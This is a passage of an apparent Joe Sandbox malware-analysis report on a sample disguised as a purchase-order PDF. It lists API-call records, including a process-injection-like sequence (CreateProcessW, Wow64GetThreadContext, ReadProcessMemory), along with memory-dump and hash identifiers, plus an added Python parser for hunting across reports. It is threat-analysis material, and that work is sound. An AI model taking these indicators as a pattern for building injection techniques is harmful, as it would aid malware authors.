• Opcode Fuzzy Hash: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
• Instruction Fuzzy Hash: E5F0A0B1500F0046E660AB3198457C7A2E09B14307F00186FB6855618ADA7C69C4CEAC
APIs
• CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0553D3BA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2078097907.000000000553B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0553B000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_553b000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: CreateProcess
• String ID: D
• API String ID: 963392458-2746444292
• Opcode ID: a782293119ad2c684ee7f4e1b7c6ce7e54987cc35907e67b60f32668cf9ab6a9
• Instruction ID: 2ed0b52ac64fda2a277fa10ee5d5329a839a24441d8090fd37aa9abe14de4ba1
• Opcode Fuzzy Hash: a782293119ad2c684ee7f4e1b7c6ce7e54987cc35907e67b60f32668cf9ab6a9
• Instruction Fuzzy Hash: 2E01127290430CABDB20DFE0CC4AFFE777CBF44741F508509AB1A9A180EA749A088B91
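Every function record in this listing has the same shape: an APIs list (with nested "Part of subcall function" entries), a Memory Dump Source, the IDA plugin snapshot, and a Similarity block that ends with the Instruction Fuzzy Hash. Pivoting on these across reports (same Opcode ID or API String ID in another sample, the same resolved registry path, the same API sequence) is easier once they are structured. The parser below is an added example, not part of the report or of Joe Sandbox's own tooling. It assumes only what is visible on this page: bullet lines begin with "•", an API line ends in "ref: <address>", subcall lines carry a "Part of subcall function <addr>:" prefix, and a record closes at its Instruction Fuzzy Hash line. Its input is a constructed transcription of the registry-query and _malloc records above, shortened in places; the dict keys and record boundaries are the example's own choices, not a documented format.

```python
"""Parse the per-function records of a Joe Sandbox "IDA Plugin" listing (the
repeating APIs / Memory Dump Source / Similarity blocks above) into dicts.

Added example, not part of the report or of Joe Sandbox's tooling. Assumes only
the layout visible on this page: bullets start with "•", API lines end in
"ref: <hex>", subcalls carry "Part of subcall function <addr>:", and a record
ends with its "Instruction Fuzzy Hash" line."""
import re

# Constructed input: two records transcribed from the listing above with the
# extraction indentation removed (raw string: backslashes are registry separators).
SAMPLE = r"""
APIs
• RegOpenKeyExW.KERNELBASE(80000001,0040F0EE,00000000,00000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F132
• RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F14F
• RegCloseKey.KERNELBASE(00000000,?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F159
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
• Opcode Fuzzy Hash: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
• Instruction Fuzzy Hash: 60F0BDB0204202ABD614DF54DD88E6BB7F9EF88704F10492DB585D7250D7B4A804CB26
APIs
• _malloc.LIBCMT ref: 00435278
  • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
• _malloc.LIBCMT ref: 00435288
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _malloc$AllocateHeap
• API String ID: 680241177-0
• Instruction Fuzzy Hash: E5F0A0B1500F0046E660AB3198457C7A2E09B14307F00186FB6855618ADA7C69C4CEAC
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
END_KEY = "Instruction Fuzzy Hash"  # last bullet of every record
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>[^.(\s]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\),)? ref: (?P<ref>[0-9A-F]{8})$")
SOURCE_RE = re.compile(
    r"^Source File: (?P<file>\S+), Offset: (?P<offset>[0-9A-F]+), based on PE: (?P<pe>true|false)$")

def _new_record():
    return {"apis": [], "strings": [], "associated": [], "source": None, "meta": {}}

def parse_records(text):
    """Split a listing into records; a record closes at its Instruction Fuzzy Hash."""
    records, rec, section = [], _new_record(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
        if not line.startswith("•"):
            continue  # blank lines, section headers, page residue such as "Download File"
        body = line[1:].strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m is None:
                raise ValueError(f"unrecognised API line: {body!r}")
            rec["apis"].append({
                "name": m["name"], "module": m["module"], "ref": int(m["ref"], 16),
                "args": m["args"].split(",") if m["args"] is not None else [],
                "subcall_of": int(m["sub"], 16) if m["sub"] else None})
        elif section == "Strings":
            rec["strings"].append(body)
        else:
            key, _, value = (part.strip() for part in body.partition(":"))
            if key == "Source File":
                s = SOURCE_RE.match(body)
                rec["source"] = {"file": s["file"], "offset": int(s["offset"], 16),
                                 "based_on_pe": s["pe"] == "true"}
            elif key == "Associated":
                rec["associated"].append(value)
            else:
                rec["meta"][key] = value
            if key == END_KEY:
                records.append(rec)
                rec = _new_record()
    return records

def api_sequence(rec, include_subcalls=False):
    """Call names in listing order; nested subcall APIs are excluded by default."""
    return [a["name"] for a in rec["apis"] if include_subcalls or a["subcall_of"] is None]

def string_args(rec):
    """Resolved string arguments (neither an 8-digit hex word nor '?'): registry
    paths, value names and file names surface here. Order kept, duplicates dropped."""
    seen = []
    for a in rec["apis"]:
        for v in a["args"]:
            if v != "?" and not re.fullmatch(r"[0-9A-F]{8}", v) and v not in seen:
                seen.append(v)
    return seen
```

The API ID, String ID and API String ID fields are kept as opaque strings: the report does not document how Joe Sandbox derives them, so the parser does not try to recompute them, only to carry them for matching against other reports. On the registry record above, `string_args` yields the `Control Panel\Mouse` key and the `SwapMouseButtons` value name, which is the kind of resolved argument worth carrying into a hunt rather than the raw handle and buffer addresses around it.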
APIs
• _wcslen.LIBCMT ref: 00401B71
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Exception@8Throw_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                                                                            • String ID: @EXITCODE
                                                                                                                                                                                                                                                                                                            • API String ID: 580348202-3436989551
                                                                                                                                                                                                                                                                                                            • Opcode ID: 4145ab2d07bf19a354fff2d5031cf88e997e0915ee9c5273387e54f5573defd1
                                                                                                                                                                                                                                                                                                            • Instruction ID: 288ad252d7dad0c090ff8240dee62855692e698d70424b42c0a66861a7771545
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4145ab2d07bf19a354fff2d5031cf88e997e0915ee9c5273387e54f5573defd1
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 73F06DF2A002025BD7649B35DC0276776E4AB44704F18C83EE14AC7791F6BDE8829B15
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 0553CA8B
                                                                                                                                                                                                                                                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0553CB21
                                                                                                                                                                                                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0553CB43
                                                                                                                                                                                                                                                                                                            • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 0553CE4C
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2078097907.000000000553B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0553B000, based on PE: false
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_553b000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Process$ContextCreateMemoryReadTerminateThreadWow64
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 572931308-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 1410da97c1c912e366cdd2316cb6e2da26cba2f02901dc8eb5c106db15075d5a
                                                                                                                                                                                                                                                                                                            • Instruction ID: 68b10aff7fde54a72f57e75119c24d543d7d15a240d45b11ed340bab04d2e8b1
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1410da97c1c912e366cdd2316cb6e2da26cba2f02901dc8eb5c106db15075d5a
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7312CF24A24658C6EB24DF64D8507DEB332FF68300F1054E9910DEB7A4E77A4E85CB5A
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ClearVariant
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 9f22ab2b20b1b15fa78bc83096d760961c9a8d2d045f27beb243143d28b696ab
                                                                                                                                                                                                                                                                                                            • Instruction ID: 1f11e118333250ff1b1cce483c812f274274124743f71e781b8a547d9d3e43da
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f22ab2b20b1b15fa78bc83096d760961c9a8d2d045f27beb243143d28b696ab
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35917E706042009FC714DF55D890A6AB7E5EF89318F14896FF849AB392D738EE41CB9E
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 0040F00A
                                                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 004299D9
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                                                                                                                                                                                                                                                            • Instruction ID: 855a981e3d87b0586b227f36a287a9e63fe5cd358b5bfab8de368ff291d46a89
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67011D703803107AF2311F28AD5BF5632546B44B24F244B39FBD5BE2E2D2F86885970C
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: __lock_file_memset
• String ID:
• API String ID: 26237723-0
• Opcode ID: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
• Instruction ID: c8a12bf2a45d0ac11074f8cac28b928f9e20b60047ac9024d749846706a082ab
• Opcode Fuzzy Hash: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
• Instruction Fuzzy Hash: 32012971C00609FBCF22AF65DC029DF3B31AF44714F04815BF82416261D7798AA2DF99
APIs
  • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
  • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
• __lock_file.LIBCMT ref: 00414EE4
  • Part of subcall function 00415965: __lock.LIBCMT ref: 0041598A
• __fclose_nolock.LIBCMT ref: 00414EEE
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: __decode_pointer__fclose_nolock__getptd_noexit__lock__lock_file
• String ID:
• API String ID: 717694121-0
• Opcode ID: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
• Instruction ID: 225a509e04b880138f2478077c57af59103cae2c072c29012e7845c0956b1514
• Opcode Fuzzy Hash: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
• Instruction Fuzzy Hash: DEF06270D0470499C721BB6A9802ADE7AB0AFC1338F21864FE479A72D1C77C46C29F5D
APIs
• TranslateMessage.USER32(?), ref: 004098F6
• DispatchMessageW.USER32(?), ref: 00409901
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Message$DispatchTranslate
• String ID:
• API String ID: 1706434739-0
• Opcode ID: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
• Instruction ID: 6b3a2aeb923af73eb4cdb1bab797699f2cf27729a5018e8568c19fb4e3feaf67
• Opcode Fuzzy Hash: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
• Instruction Fuzzy Hash: D4F05471114301AEDA24DBE58D41B5BB3A8AFD8700F408C2EBA51E61C1FBF8E404C76A
APIs
• TranslateMessage.USER32(?), ref: 004098F6
• DispatchMessageW.USER32(?), ref: 00409901
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Message$DispatchTranslate
• String ID:
• API String ID: 1706434739-0
• Opcode ID: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
• Instruction ID: cc4909b6a78c34842ee59a7900970f574117f06624f4f9c7373c79b1fb9dfc76
• Opcode Fuzzy Hash: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
• Instruction Fuzzy Hash: DDF054B1114301AADA14DBE58D41B5BB3A4AF94740F408C2EBA11E52C1EBFCD504C71A
APIs
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction ID: fb1d736feddc8336b94c661b4f3a99b04f66f7614ca83ae43ac4a02a862e88ab
• Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction Fuzzy Hash: 1331D574A00105DFC718DF99E490AAAFBA6FB49304B2486A6E409CB751D774EDC1CBC5
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4308273726a8cf553c97676f4e4ed14cf105674e43f0e6cd586214b84984ce81
• Instruction ID: 573dba848690e0cdfd4c9be45b5663ff9194aa529e9341154cf92adfcd841cf8
• Opcode Fuzzy Hash: 4308273726a8cf553c97676f4e4ed14cf105674e43f0e6cd586214b84984ce81
• Instruction Fuzzy Hash: 5E11C374200200ABC7249FAAD8D5F2A73A5AF45304B244C6FE845E7392D73CEC81EB5E
APIs
• DefWindowProcW.USER32(?,?,?,?), ref: 00401123
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: ProcWindow
• String ID:
• API String ID: 181713994-0
• Opcode ID: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
• Instruction ID: 72bdf1ad184d721e15e17473fba0dc1faec6c1a9a9d1f3fcb71c15abd8c9f185
• Opcode Fuzzy Hash: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
• Instruction Fuzzy Hash: FDF05436700118A7DF38995CE89ACFF632AD7ED350F418227FD152B3A6813C5C41966E
APIs
• HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041AA46
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: CreateHeap
• String ID:
• API String ID: 10892065-0
• Opcode ID: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
• Instruction ID: 99ddfbee892492b32903703907324a593b21f4d4a70cf9c354be63060b8faba1
• Opcode Fuzzy Hash: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
• Instruction Fuzzy Hash: 56D05E325543449EDF009F71AC087663FDCE788395F008836BC1CC6150E778C950CA08
APIs
• Part of subcall function 00444326: SetFilePointerEx.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,0044434E,?,?,00429A83,?,00487174,00000003,0040DFEE,?), ref: 004442F3
• WriteFile.KERNELBASE(?,?,00000001,?,00000000,?,?,00429A83,?,00487174,00000003,0040DFEE,?,?,00000001,00403843), ref: 00444362
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: File$PointerWrite
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 539440098-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                                                                                                                                                                                                                                                            • Instruction ID: 4a339a6eb5dfef6003722c1615037f540bc53d76d7f4c43935d02bdd90bbdfc9
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CE09275104311AFD250DF54D944F9BB3F8AF88714F108D0EF59587241D7B4A9848BA6
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                                                                                                                                                                                                                                                            Memory Dump Source
